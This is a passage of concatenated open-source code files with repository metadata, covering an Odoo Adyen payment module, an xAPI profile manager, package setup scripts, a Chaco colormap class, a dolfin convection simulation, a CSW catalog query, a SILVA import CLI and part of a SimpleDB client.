    acquirer = self.browse(cr, uid, id, context=context)
    # Temporary session/shipping horizon: one day from today.
    # NOTE(review): a date object is passed as-is and relies on its string
    # conversion; Adyen expects ISO-8601 text here -- confirm the format.
    import datetime
    from dateutil import relativedelta
    tmp_date = datetime.date.today() + relativedelta.relativedelta(days=1)
    values.update({
        'merchantReference': values['reference'],
        # Amount is expressed in minor units (cents), hence the * 100.
        'paymentAmount': '%d' % int(float_round(values['amount'], 2) * 100),
        'currencyCode': values['currency'] and values['currency'].name or '',
        'shipBeforeDate': tmp_date,
        'skinCode': acquirer.adyen_skin_code,
        'merchantAccount': acquirer.adyen_merchant_account,
        'shopperLocale': values.get('partner_lang'),
        'sessionValidity': tmp_date,
        'resURL': '%s' % urlparse.urljoin(base_url, AdyenController._return_url),
        # Round-trip the caller's return URL through Adyen's merchantReturnData.
        'merchantReturnData': json.dumps({'return_url': '%s' % values.pop('return_url')}) if values.get('return_url') else False,
        # Signature must be computed last, over all the values above.
        'merchantSig': self._adyen_generate_merchant_sig(acquirer, 'in', values),
    })
    return values
def adyen_get_form_action_url(self, cr, uid, id, context=None):
    """Return the Adyen HPP endpoint matching the acquirer's environment."""
    record = self.browse(cr, uid, id, context=context)
    urls = self._get_adyen_urls(cr, uid, record.environment, context=context)
    return urls['adyen_form_url']
class TxAdyen(osv.Model):
    """payment.transaction extension implementing the Adyen feedback flow."""
    _inherit = 'payment.transaction'

    # --------------------------------------------------
    # FORM RELATED METHODS
    # --------------------------------------------------

    def _adyen_form_get_tx_from_data(self, cr, uid, data, context=None):
        """Find the transaction matching an Adyen notification.

        Looks the transaction up by ``merchantReference`` and authenticates
        the notification by recomputing ``merchantSig``.

        :raises ValidationError: when reference/pspReference is missing,
            when zero or several transactions match, or when the signature
            does not verify.
        """
        reference, pspReference = data.get('merchantReference'), data.get('pspReference')
        if not reference or not pspReference:
            error_msg = _('Adyen: received data with missing reference (%s) or missing pspReference (%s)') % (reference, pspReference)
            _logger.info(error_msg)
            raise ValidationError(error_msg)
        # find tx -> @TDENOTE use pspReference ?
        tx_ids = self.pool['payment.transaction'].search(cr, uid, [('reference', '=', reference)], context=context)
        if not tx_ids or len(tx_ids) > 1:
            error_msg = _('Adyen: received data for reference %s') % (reference)
            if not tx_ids:
                error_msg += _('; no order found')
            else:
                error_msg += _('; multiple order found')
            _logger.info(error_msg)
            raise ValidationError(error_msg)
        tx = self.pool['payment.transaction'].browse(cr, uid, tx_ids[0], context=context)
        # verify shasign: recompute the 'out' signature locally and compare
        # with the one Adyen sent, to authenticate the notification.
        shasign_check = self.pool['payment.acquirer']._adyen_generate_merchant_sig(tx.acquirer_id, 'out', data)
        if shasign_check != data.get('merchantSig'):
            error_msg = _('Adyen: invalid merchantSig, received %s, computed %s') % (data.get('merchantSig'), shasign_check)
            _logger.warning(error_msg)
            raise ValidationError(error_msg)
        return tx

    def _adyen_form_get_invalid_parameters(self, cr, uid, tx, data, context=None):
        """Return (name, received, expected) tuples for inconsistent fields."""
        invalid_parameters = []
        # reference at acquirer: pspReference
        if tx.acquirer_reference and data.get('pspReference') != tx.acquirer_reference:
            invalid_parameters.append(('pspReference', data.get('pspReference'), tx.acquirer_reference))
        # seller
        if data.get('skinCode') != tx.acquirer_id.adyen_skin_code:
            invalid_parameters.append(('skinCode', data.get('skinCode'), tx.acquirer_id.adyen_skin_code))
        # result
        if not data.get('authResult'):
            invalid_parameters.append(('authResult', data.get('authResult'), 'something'))
        return invalid_parameters

    def _adyen_form_validate(self, cr, uid, tx, data, context=None):
        """Update the transaction state from Adyen's ``authResult``.

        AUTHORISED -> done, PENDING -> pending, anything else -> error.
        Returns True for done/pending, False for error.
        """
        status = data.get('authResult', 'PENDING')
        if status == 'AUTHORISED':
            tx.write({
                'state': 'done',
                'acquirer_reference': data.get('pspReference'),
                # 'date_validate': data.get('payment_date', fields.datetime.now()),
                # 'paypal_txn_type': data.get('express_checkout')
            })
            return True
        elif status == 'PENDING':
            tx.write({
                'state': 'pending',
                'acquirer_reference': data.get('pspReference'),
            })
            return True
        else:
            error = _('Adyen: feedback error')
            _logger.info(error)
            tx.write({
                'state': 'error',
                'state_message': error
            })
            return False
|
minhphung171093/GreenERP
|
openerp/addons/payment_adyen/models/adyen.py
|
Python
|
gpl-3.0
| 7,511
|
import json
import datetime
from django.core.files.base import ContentFile
from django.core.exceptions import ValidationError
from django.utils.timezone import utc
from ..models import AgentProfile
from ..exceptions import IDNotFoundError, ParamError
from ..utils import etag
class AgentProfileManager():
    """Create, read, update and delete xAPI Agent Profile documents.

    Operates on the ``AgentProfile`` rows scoped to a single agent. JSON
    profiles are stored inline (and shallow-merged on POST); any other
    content type is stored as a file attachment.
    """

    def __init__(self, agent):
        self.Agent = agent

    def _updated_timestamp(self, request_dict):
        # Honor a client-supplied 'updated' header; otherwise use "now" (UTC).
        headers = request_dict['headers']
        if 'updated' in headers and headers['updated']:
            return headers['updated']
        return datetime.datetime.utcnow().replace(tzinfo=utc)

    def save_non_json_profile(self, p, profile, request_dict):
        """Persist a non-JSON profile document as a file on the profile row."""
        p.content_type = request_dict['headers']['CONTENT_TYPE']
        p.etag = etag.create_tag(profile.read())
        p.updated = self._updated_timestamp(request_dict)
        # Go back to the beginning of the file so the full content is saved.
        profile.seek(0)
        fn = "%s_%s" % (p.agent_id, request_dict.get('filename', p.id))
        p.profile.save(fn, profile)
        p.save()

    def post_profile(self, request_dict):
        """Create a JSON profile or merge into an existing one (POST)."""
        # get/create profile
        p, created = AgentProfile.objects.get_or_create(
            profile_id=request_dict['params']['profileId'], agent=self.Agent)
        post_profile = request_dict['profile']
        if created:
            # No profile existed for this agent/profileId: store as-is.
            p.json_profile = post_profile
            p.content_type = "application/json"
            p.etag = etag.create_tag(post_profile)
        else:
            # Profile already existed: shallow-merge, incoming keys win.
            orig_prof = json.loads(p.json_profile)
            post_profile = json.loads(post_profile)
            merged = json.dumps(
                dict(list(orig_prof.items()) + list(post_profile.items())))
            p.json_profile = merged
            p.etag = etag.create_tag(merged)
        # Set updated
        p.updated = self._updated_timestamp(request_dict)
        p.save()

    def put_profile(self, request_dict):
        """Create or fully replace a profile document (PUT)."""
        # get/create profile
        p, created = AgentProfile.objects.get_or_create(
            profile_id=request_dict['params']['profileId'], agent=self.Agent)
        # Profile being PUT is not json
        if "application/json" not in request_dict['headers']['CONTENT_TYPE']:
            # Normalize the payload into a ContentFile whatever shape it
            # arrives in: file-like, raw str/bytes, or any other object.
            try:
                profile = ContentFile(request_dict['profile'].read())
            except Exception:
                try:
                    profile = ContentFile(request_dict['profile'])
                except Exception:
                    profile = ContentFile(str(request_dict['profile']))
            etag.check_preconditions(request_dict, p, created)
            # If a file already exists delete it before saving the new one.
            if p.profile:
                try:
                    p.profile.delete()
                except OSError:
                    # probably was json before
                    p.json_profile = {}
            self.save_non_json_profile(p, profile, request_dict)
        # Profile being PUT is json
        else:
            # (overwrite existing profile data)
            etag.check_preconditions(request_dict, p, created)
            the_profile = request_dict['profile']
            p.json_profile = the_profile
            p.content_type = request_dict['headers']['CONTENT_TYPE']
            p.etag = etag.create_tag(the_profile)
            # Set updated
            p.updated = self._updated_timestamp(request_dict)
            p.save()

    def get_profile(self, profile_id):
        """Return the profile row for ``profile_id`` or raise IDNotFoundError."""
        try:
            return self.Agent.agentprofile_set.get(profile_id=profile_id)
        except Exception:
            err_msg = 'There is no agent profile associated with the id: %s' % profile_id
            raise IDNotFoundError(err_msg)

    def get_profile_ids(self, since=None):
        """List profile ids for this agent, optionally updated after ``since``."""
        ids = []
        if since:
            try:
                # this expects iso6801 date/time format
                # "2013-02-15T12:00:00+00:00"
                profs = self.Agent.agentprofile_set.filter(updated__gt=since)
            except ValidationError:
                err_msg = 'Since field is not in correct format for retrieval of agent profiles'
                raise ParamError(err_msg)
            ids = [p.profile_id for p in profs]
        else:
            ids = self.Agent.agentprofile_set.values_list(
                'profile_id', flat=True)
        return ids

    def delete_profile(self, profile_id):
        """Delete the profile if present; missing profiles are ignored."""
        try:
            self.get_profile(profile_id).delete()
        # we don't want it anyway
        except AgentProfile.DoesNotExist:
            pass
        except IDNotFoundError:
            pass
|
adlnet/ADL_LRS
|
lrs/managers/AgentProfileManager.py
|
Python
|
apache-2.0
| 5,034
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
import os
from setuptools import setup
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as f:
return f.read()
# Package metadata for django-pudb. The long description is sourced from
# the README so PyPI mirrors the repository documentation.
setup(
    name='django-pudb',
    version='0.1.0',
    description='PuDB integration for Django.',
    long_description=read('README.md'),
    url='https://github.com/akanouras/django-pudb/',
    license='MIT',
    author='Antonis Kanouras',
    author_email='antonis@metadosis.eu',
    # Single-module distribution: only django_pudb.py is shipped.
    py_modules=['django_pudb'],
    include_package_data=True,
    classifiers=[
        'Development Status :: 1 - Planning',
        'Intended Audience :: Developers',
        'Natural Language :: English',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ],
)
|
akanouras/django-pudb
|
setup.py
|
Python
|
mit
| 1,352
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from setuptools import setup, find_packages
# Version of this test harness package (independent of the pinned
# marionette-client dependency below).
PACKAGE_VERSION = '0.1'

# Runtime dependencies; marionette-client is pinned to a known-good release.
deps = [
    'marionette-client == 0.8.7',
]

setup(name='firefox-ui-tests',
      version=PACKAGE_VERSION,
      description='A collection of Mozilla Firefox UI tests run with Marionette',
      long_description='See https://github.com/mozilla/firefox-ui-tests',
      classifiers=['Environment :: Console',
                   'Intended Audience :: Developers',
                   'License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)',
                   'Natural Language :: English',
                   'Operating System :: OS Independent',
                   'Programming Language :: Python',
                   'Topic :: Software Development :: Libraries :: Python Modules',
                   ],
      keywords='mozilla',
      author='Mozilla Automation and Tools Team',
      author_email='tools@lists.mozilla.org',
      url='https://github.com/mozilla/firefox-ui-tests',
      license='MPL 2.0',
      packages=find_packages(),
      include_package_data=True,
      zip_safe=False,
      install_requires=deps,
      # Expose the harness runner as the `firefox-ui-tests` console script.
      entry_points="""
[console_scripts]
firefox-ui-tests = firefox_ui_harness:run
""")
|
chmanchester/firefox-ui-tests
|
setup.py
|
Python
|
mpl-2.0
| 1,414
|
""" Defines the base class for color maps
"""
from traits.api import Enum, HasTraits, Instance
from data_range_1d import DataRange1D
class AbstractColormap(HasTraits):
    """
    Abstract class for color maps, which map from scalar values to color
    values. Subclasses must implement map_screen(); map_uint8() has a
    (slow) default implementation built on top of it.
    """

    # The data-space bounds of the mapper.
    range = Instance(DataRange1D)

    # The color depth of the colors to use: RGBA (with alpha) or plain RGB.
    color_depth = Enum('rgba', 'rgb')

    def map_screen(self, val):
        """
        map_screen(val) -> color

        Maps an array of values to an array of colors.  If the input array is
        NxM, the returned array is NxMx3 or NxMx4, depending on the
        **color_depth** setting.
        """
        raise NotImplementedError()

    def map_data(self, ary):
        """
        map_data(ary) -> color_array

        Returns an array of values containing the colors mapping to the values
        in *ary*. If the input array is NxM, the returned array is NxMx3 or
        NxMx4, depending on the **color_depth** setting.
        """
        # XXX this seems bogus: by analogy with AbstractMapper, this should map
        # colors to data values, and that will be generally hard to do well.
        # no subclass implements this - CJW
        raise NotImplementedError()

    def map_index(self, ary):
        """
        map_index(ary) -> index into color_bands

        This method is like map_screen(), but it returns an array of indices
        into the color map's color bands instead of an array of colors.  If
        the input array is NxM, then the output is NxM integer indices.

        This method might not apply to all color maps.  Ones that cannot
        define a static set of color bands (e.g., function-defined color maps)
        are not able to implement this function.
        """
        raise NotImplementedError()

    def map_uint8(self, val):
        """
        map_uint8(val) -> rgb24 or rgba32 color

        Maps a single value to a single color.  Color is represented as either
        length-3 or length-4 array of rgb(a) uint8 values, depending on the
        **color_depth** setting.
        """
        # default implementation (not efficient): scale the float colors
        # produced by map_screen into 0..255 bytes.
        return (self.map_screen(val)*255.0).astype('uint8')
# EOF
|
burnpanck/chaco
|
chaco/abstract_colormap.py
|
Python
|
bsd-3-clause
| 2,253
|
#! /usr/bin/env python
from dolfin import *
from utilities import *
set_dolfin_optimisation()
from dolfin_fvm import *
import numpy
import argparse
# Command-line options for the coupled Stokes/temperature cavity demo.
parser = argparse.ArgumentParser(description = 'coupling demo')
parser.add_argument('--correct', action='store_true', default=False)     # use corrected mass flux (uh - delta*grad(ph))
parser.add_argument('--limit', action='store_true', default=False)       # clip temperature to its initial bounds
parser.add_argument('--Ra', type=float, default = 1e6)                   # Rayleigh number (eps = 1/Ra)
parser.add_argument('--tol', type=float, default = 1e-8)                 # steady-state tolerance on |du/dt|
parser.add_argument('--n', type=int, default = 40)                       # base mesh resolution
parser.add_argument('--CFL', type=float, default = 1.0)                  # CFL safety factor for dt
parser.add_argument('--tend', type=float, default = 1)                   # end time of the simulation
parser.add_argument('--dim', type=int, default = 2)                      # spatial dimension (2 or 3)
parser.add_argument('--sparselu', action='store_true', default=False)    # direct LU instead of Krylov/AMG
parser.add_argument('--secondorder', action='store_true', default=False) # SSP(2,2) Runge-Kutta time stepping
parser.add_argument('--update_u_every', type=int, default = 1)           # Stokes re-solve frequency (in steps)
parser.add_argument('--adaptlayers', type=int, default=2)                # boundary-layer refinement passes
parser.add_argument('--refine', type=int, default=0)                     # additional uniform refinements
parser.add_argument('--graddiv_pen', type=float, default = 0.0)          # grad-div penalty parameter gamma
parser.add_argument('--output', action='store_true', default=False)      # write PVD output at the end
parser.add_argument('--plot', action='store_true', default=False)        # plot the final temperature
args = parser.parse_args()
print args
# problem definition
if args.dim is 2:
mesh = UnitSquareMesh(args.n, args.n, 'crossed')
elif args.dim is 3:
mesh = UnitCubeMesh(args.n, args.n, args.n)
else:
print 'dimension {0} not supported!'.format(args.dim)
exit()
vol = assemble(1*dx(mesh))      # domain volume (used to scale the rms velocity)
dim = mesh.topology().dim()
# Refine towards all boundaries, then optionally refine uniformly.
mesh = refine_boundary_layers(mesh, args.adaptlayers, range(dim), [0.0]*dim, [1.0]*dim)
for i in xrange(args.refine):
    mesh = refine(mesh)
#plot(mesh, interactive=True); exit()
ccfl = args.CFL
eps = Constant(1.0/args.Ra)     # diffusion coefficient = 1/Ra
theta_init_expr = '1.0 - x[0]'  # linear initial profile: 1 at x=0, 0 at x=1
theta_init = Expression(theta_init_expr)
# function spaces
V = VectorFunctionSpace(mesh, 'CG', 1)
Vd = VectorFunctionSpace(mesh, 'DG', 1)   # discontinuous space for the mass flux
Q = FunctionSpace(mesh, 'CG', 1)
R = FunctionSpace(mesh, 'R', 0)           # global real space (pressure mean constraint)
W = MixedFunctionSpace([V, Q, R])
u, p, m = TrialFunctions(W)
v, q, r = TestFunctions(W)
wh = Function(W)
uh, ph, rh = wh.split()
theta = interpolate(theta_init, Q)
theta_0 = Function(Q)   # previous time level theta^n
theta_1 = theta         # first stage (aliases theta itself)
theta_2 = Function(Q)   # second Runge-Kutta stage
# Bounds of the initial data; used by --limit to clip over/undershoots.
theta_min = min(theta.vector()[:])
theta_max = max(theta.vector()[:])
h = CellSize(mesh)
nu = Constant(1)
ez = as_vector([0]*(dim-1) + [-1])   # unit vector pointing "down" in the last axis
F = -ez*theta_1                      # temperature-driven forcing term
delta = h**2*Constant(1./12)/nu      # pressure stabilization parameter
gamma = Constant(args.graddiv_pen)
# free-slip boundary conditions for velocity
bc_u = [ DirichletBC(W.sub(0), Constant([0.0]*dim), 'on_boundary') ]
# boundary conditions for temperature
left = CompiledSubDomain('on_boundary && near(x[0], 0.0)')
right = CompiledSubDomain('on_boundary && near(x[0], 1.0)')
bc_theta = [ DirichletBC(Q, theta_init, left), DirichletBC(Q, theta_init, right) ]
# bilinear and linear forms
def a(u,v): return inner(2*nu*sym(grad(u)),grad(v))*dx
def b(v,q): return -div(v)*q*dx
def f(v): return dot(F, v)*dx
# variational problem (Stokes + grad-div penalty + pressure stabilization
# + zero-mean pressure constraint via the multiplier m/r)
stokes = a(u,v) + b(v,p) + b(u,q) - f(v) \
    + gamma*div(u)*div(v)*dx \
    - dot(delta*grad(p), grad(q))*dx \
    + p*r*dx + m*q*dx
stokes_prec = inner(nu*grad(u),grad(v))*dx - p*q/nu*dx - m*r*dx - f(v)
t, i = 0.0, 0
log = []
U = Function(Vd)
# lumped mass
tmp = Vector(theta.vector())
p, q = TrialFunction(Q), TestFunction(Q)
l_mass = assemble(action(p*q*dx, Constant(1)))
# operators
A = assemble(lhs(stokes))
l = assemble(rhs(stokes))
if args.sparselu:
    solver = LUSolver()
    solver.set_operator(A)
else:
    # AMG-preconditioned TFQMR; prefer ML AMG when the backend provides it.
    amg = 'amg' if not has_krylov_solver_preconditioner('ml_amg') else 'ml_amg'
    solver = KrylovSolver('tfqmr', amg)
    solver.parameters['nonzero_initial_guess'] = True
    solver.parameters['relative_tolerance'] = 1e-8
    #solver.parameters['monitor_convergence'] = True
    P = assemble(lhs(stokes_prec))
    for bc in bc_u: bc.apply(P, l)
    solver.set_operators(A, P)
# Stokes part
def solve_stokes():
    # solve Stokes part
    l = assemble(rhs(stokes))
    for bc in bc_u: bc.apply(A, l)
    its = solver.solve(wh.vector(), l)
    # corrected mass flux: with --correct, subtract delta*grad(ph) from the
    # velocity (presumably to recover a conservative flux -- see GWW14).
    U.assign(project(uh - delta*grad(ph) if args.correct else uh, Vd))
    return its

# temperature part
def advance_temperature(theta_new, theta_old):
    # diffusion part: explicit update using the lumped mass matrix l_mass
    assemble(dot(-eps*grad(theta_old), grad(q))*dx, tensor = tmp)
    for idx, tmpidx in enumerate(tmp):
        tmp[idx] = tmpidx/l_mass[idx]
    # advection part (finite-volume advance), then add the diffusion term
    theta_new.assign(theta_old)
    advance(theta_new, theta_old, U, dt)
    theta_new.vector().axpy(dt, tmp)
    theta_new.vector().apply('insert')

its = solve_stokes() # initial field
while t < args.tend + DOLFIN_EPS:
    # compute CFL: dt is the minimum of the diffusive limit (~Ra*h^2/4)
    # and the advective limit (h/umax), scaled by the safety factor.
    umax = numpy.max(numpy.abs(U.vector().array()))
    #umax = sqrt(numpy.max(project(dot(U,U), Q).vector().array()))
    dt = ccfl*min(0.25*args.Ra*mesh.hmin()**2, mesh.hmin()/umax)
    theta_0.assign(theta)
    # theta^(1) = theta^n + dt*L(theta^n)
    advance_temperature(theta_1, theta_0)
    # intermediate solve (velocity is only refreshed every update_u_every steps)
    if not (i % args.update_u_every):
        its = solve_stokes()
    else:
        its = 0
    if args.secondorder: # explicit SSP(2,2) Runge-Kutta
        # theta^(2) = theta^(1) + dt*L(theta^(1))
        advance_temperature(theta_2, theta_1)
        # theta^{n+1} = 0.5*(theta^n + theta^(2))
        theta.vector()[:] = 0.0
        theta.vector().axpy(0.5, theta_0.vector())
        theta.vector().axpy(0.5, theta_2.vector())
    else: # explicit Euler
        # theta^{n+1} = theta^(1) = theta^n + dt*L(theta^n)
        theta.assign(theta_1)
    for bc in bc_theta: bc.apply(theta.vector())
    #theta.vector().apply('insert')
    if(args.limit): # limit to physical bounds
        theta.vector()[theta.vector() < theta_min] = theta_min
        theta.vector()[theta.vector() > theta_max] = theta_max
    t += dt; i = i + 1
    rms = norm(U)/vol
    dudt = errornorm(theta, theta_0, 'L2')/dt
    print 't =', t, 'dt =', dt, 'its({0}/{1}) ='.format(i,args.update_u_every), its, \
        'rms =', rms, '|du/dt| =', dudt
    log.append((t, rms))
    # stop once the temperature field is (quasi-)stationary
    if dudt < args.tol: break
if args.plot:
    plot(theta, mode='color')
if args.output:
    File('output/cavity-{0}-{1}-{2}-GWW14.pvd'.format(args.Ra, args.n*2**args.refine, args.correct)) << theta
#interactive()
|
cwaluga/conservative_dolfin
|
src/cavity.py
|
Python
|
mit
| 6,198
|
# coding: utf-8
# # Query `apiso:ServiceType` on data.gov
# In[26]:
from owslib.csw import CatalogueServiceWeb
from owslib import fes
import numpy as np
# In[27]:
# Granule-level production catalog at data.gov; the IOOS endpoint below is
# kept (commented out) as an alternative.
endpoint = 'http://catalog.data.gov/csw-all' #granule level production catalog
#endpoint = 'http://data.ioos.us/csw'
csw = CatalogueServiceWeb(endpoint,timeout=60)
print csw.version

# In[28]:
# First free-text filter: records mentioning 'coawst'.
val = 'coawst'
filter1 = fes.PropertyIsLike(propertyname='apiso:AnyText',literal=('*%s*' % val),
                             escapeChar='\\',wildCard='*',singleChar='?')
filter_list = [ filter1 ]

# In[29]:
# AND a second free-text term: both must match.
val = 'experimental'
filter2 = fes.PropertyIsLike(propertyname='apiso:AnyText',literal=('*%s*' % val),
                             escapeChar='\\',wildCard='*',singleChar='?')
filter_list = [fes.And([filter1, filter2])]

# In[30]:
csw.getrecords2(constraints=filter_list,maxrecords=100,esn='full')
print len(csw.records.keys())
for rec in list(csw.records.keys()):
    print csw.records[rec].title

# In[31]:
# Inspect one matching record picked at random.
choice=np.random.choice(list(csw.records.keys()))
print(csw.records[choice].title)
csw.records[choice].references

# In[32]:
csw.records[choice].xml

# We see that the `OPeNDAP` service is available, so let's add that to query
# In[34]:
# Third filter: restrict to records advertising an OPeNDAP service type.
val = 'opendap'
filter3 = fes.PropertyIsLike(propertyname='apiso:ServiceType',literal=('*%s*' % val),
                             escapeChar='\\',wildCard='*',singleChar='?')
filter_list = [fes.And([filter1, filter2, filter3])]

# In[35]:
csw.getrecords2(constraints=filter_list,maxrecords=100,esn='full')
print len(csw.records.keys())
for rec in list(csw.records.keys()):
    print csw.records[rec].title

# Oops. We get no records now. This should have returned the same records. This should work when data.gov applies this patch to pycsw:
#
# https://github.com/geopython/pycsw/commit/d1d3c4ea7ba5b651353d22b2759bab64c6d57d87
#
|
rsignell-usgs/notebook
|
CSW/data.gov_pycsw.py
|
Python
|
mit
| 1,865
|
# -*- coding: utf-8 -*-
"""
Copyright [2009-2020] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pathlib import Path
import click
from rnacentral_pipeline.databases.silva import parser as silva
from rnacentral_pipeline.writers import entry_writer
# Click command group; subcommands (e.g. `silva parse`) attach via @cli.command.
@click.group("silva")
def cli():
    """
    Commands for dealing with SILVA data.
    """
# `silva parse SILVA_FILE TAXONOMY [OUTPUT]`: parse a SILVA export plus a
# taxonomy path and write the resulting entries into OUTPUT (default: cwd).
# Comments are used instead of a docstring here so the click help text is
# left unchanged.
@cli.command("parse")
@click.argument("silva-file", type=click.File("r"))
@click.argument("taxonomy", type=click.Path())
@click.argument(
    "output",
    default=".",
    type=click.Path(
        writable=True,
        dir_okay=True,
        file_okay=False,
    ),
)
def process_silva(silva_file, taxonomy, output):
    # Feed the parsed entries straight into the project's entry writer.
    entries = silva.parse(silva_file, taxonomy)
    with entry_writer(Path(output)) as writer:
        writer.write(entries)
|
RNAcentral/rnacentral-import-pipeline
|
rnacentral_pipeline/cli/silva.py
|
Python
|
apache-2.0
| 1,309
|
import httplib2
import urlparse
import urllib
import time
import hmac
import base64
try:
import xml.etree.ElementTree as ET
except ImportError:
import elementtree.ElementTree as ET
from UserDict import DictMixin
__all__ = ['SimpleDB', 'Domain', 'Item', 'AttributeEncoder', 'where', 'every', 'item_name', 'SimpleDBError', 'ItemDoesNotExist']
# Maps double-underscore query suffixes (e.g. attr__gte) to the comparison
# operators of SimpleDB select expressions; presumably consumed by the
# query-building code later in this module (outside this chunk).
QUERY_OPERATORS = {
    # Note that `is null`, `is not null` and `every` are handled specially by using
    # attr__eq = None, attr__noteq = None, and every(), respectively.
    'eq': '=', # equals
    'noteq': '!=', # not equals
    'gt': '>', # greather than
    'gte': '>=', # greater than or equals
    'lt': '<', # less than
    'lte': '<=', # less than or equals
    'like': 'like', # contains, works with `%` globs: '%string' or 'string%'
    'notlike': 'not like', # doesn't contain
    'btwn': 'between', # falls within range (inclusive)
    'in': 'in', # equal to one of
}

# Reserved words of the SimpleDB select language; presumably used to decide
# when attribute names need quoting (usage is outside this chunk).
RESERVED_KEYWORDS = (
    'OR', 'AND', 'NOT', 'FROM', 'WHERE', 'SELECT', 'LIKE', 'NULL', 'IS', 'ORDER',
    'BY', 'ASC', 'DESC', 'IN', 'BETWEEN', 'INTERSECTION', 'LIMIT', 'EVERY',
)
# Raised when the SimpleDB service reports an error in its XML response,
# or when a required request parameter is missing.
class SimpleDBError(Exception): pass

# Raised when a requested item does not exist; presumably raised by item
# lookups defined later in this module (outside this chunk).
class ItemDoesNotExist(Exception): pass
def generate_timestamp():
    """Return the current UTC time as an ISO-8601 string (no zone suffix)."""
    now_utc = time.gmtime()
    return time.strftime('%Y-%m-%dT%H:%M:%S', now_utc)
def _utf8_str(s):
    """Coerce `s` to a UTF-8 byte string: unicode is encoded, the rest str()'d."""
    return s.encode('utf-8') if isinstance(s, unicode) else str(s)
def escape(s):
    # Percent-encode per AWS rules: only '-', '_' and '~' stay unescaped
    # (urllib.quote would otherwise also leave '/' alone).
    return urllib.quote(s, safe='-_~')
def urlencode(d):
    """Render a dict or iterable of (key, value) pairs as an escaped query string."""
    pairs = d.iteritems() if isinstance(d, dict) else d
    return '&'.join('%s=%s' % (escape(key), escape(val)) for key, val in pairs)
class SignatureMethod(object):
    """Base class for AWS request-signing strategies.

    Subclasses supply `name` (the value sent as the SignatureMethod
    parameter) and `build_signature`; this base class builds the canonical
    string-to-sign.
    """

    @property
    def name(self):
        raise NotImplementedError

    def build_signature_base_string(self, request):
        # Canonical string per AWS signature version 2: HTTP method, host,
        # path and the sorted escaped parameters, joined by newlines.
        sig = '\n'.join((
            request.get_normalized_http_method(),
            request.get_normalized_http_host(),
            request.get_normalized_http_path(),
            request.get_normalized_parameters(),
        ))
        return sig

    def build_signature(self, request, aws_secret):
        raise NotImplementedError
class SignatureMethod_HMAC_SHA1(SignatureMethod):
    """HMAC-SHA1 request signing (fallback for Pythons without hashlib)."""
    name = 'HmacSHA1'
    version = '2'

    def build_signature(self, request, aws_secret):
        base = self.build_signature_base_string(request)
        # Prefer hashlib (Python 2.5+); fall back to the deprecated sha module.
        try:
            import hashlib # 2.5
            hashed = hmac.new(aws_secret, base, hashlib.sha1)
        except ImportError:
            import sha # deprecated
            hashed = hmac.new(aws_secret, base, sha)
        return base64.b64encode(hashed.digest())
class SignatureMethod_HMAC_SHA256(SignatureMethod):
    """HMAC-SHA256 request signing (used when hashlib is available)."""
    name = 'HmacSHA256'
    version = '2'

    def build_signature(self, request, aws_secret):
        import hashlib
        base = self.build_signature_base_string(request)
        hashed = hmac.new(aws_secret, base, hashlib.sha256)
        return base64.b64encode(hashed.digest())
class Response(object):
    """Value object bundling an HTTP response with SimpleDB metadata.

    `request_id` and `usage` come from the ResponseMetadata element that
    accompanies every SimpleDB reply.
    """
    def __init__(self, response, content, request_id, usage):
        self.response = response      # httplib2 response object
        self.content = content        # raw XML body
        self.request_id = request_id  # AWS RequestId
        self.usage = usage            # BoxUsage reported by the service
class Request(object):
    """A single (to-be-signed) HTTP request to the SimpleDB endpoint."""

    def __init__(self, method, url, parameters=None):
        self.method = method
        self.url = url
        self.parameters = parameters or {}

    def set_parameter(self, name, value):
        self.parameters[name] = value

    def get_parameter(self, parameter):
        try:
            return self.parameters[parameter]
        except KeyError:
            raise SimpleDBError('Parameter not found: %s' % parameter)

    def to_postdata(self):
        # UTF-8 encode every key/value before percent-escaping.
        return urlencode([(_utf8_str(k), _utf8_str(v)) for k, v in self.parameters.iteritems()])

    def get_normalized_parameters(self):
        """
        Returns the URL-encoded parameters, sorted by key and excluding
        the Signature itself -- the canonical form required in the
        signature base string.
        """
        return urlencode([(_utf8_str(k), _utf8_str(v)) for k, v in
                          sorted(self.parameters.iteritems())
                          if k != 'Signature'])

    def get_normalized_http_method(self):
        return self.method.upper()

    def get_normalized_http_path(self):
        parts = urlparse.urlparse(self.url)
        if not parts[2]:
            # For an empty path use '/'
            return '/'
        return parts[2]

    def get_normalized_http_host(self):
        parts = urlparse.urlparse(self.url)
        return parts[1].lower()

    def sign_request(self, signature_method, aws_key, aws_secret):
        # Stamp the auth parameters first, then compute the signature over
        # the fully populated parameter set.
        self.set_parameter('AWSAccessKeyId', aws_key)
        self.set_parameter('SignatureVersion', signature_method.version)
        self.set_parameter('SignatureMethod', signature_method.name)
        self.set_parameter('Timestamp', generate_timestamp())
        self.set_parameter('Signature', signature_method.build_signature(self, aws_secret))
class AttributeEncoder(object):
    """
    AttributeEncoder converts Python objects into UTF8 strings suitable for
    storage in SimpleDB.

    This base implementation is an identity codec; subclasses override
    encode/decode to transform values per domain/attribute.
    """
    def encode(self, domain, attribute, value):
        return value

    def decode(self, domain, attribute, value):
        return value
class NumberEncoder(object):
    """Offset-based int codec: ints are stored shifted by +10000.

    NOTE(review): asymmetric for ints below -10000 (the encoded string
    starts with '-' and fails isdigit() on decode), and any stored
    digit-only string will be decoded as a number -- confirm acceptable.
    """
    def encode(self, domain, attribute, value):
        # Only ints are shifted; every other value passes through untouched.
        if isinstance(value, int):
            return str(value + 10000)
        return value

    def decode(self, domain, attribute, value):
        # Digit-only strings are assumed to be encoded ints.
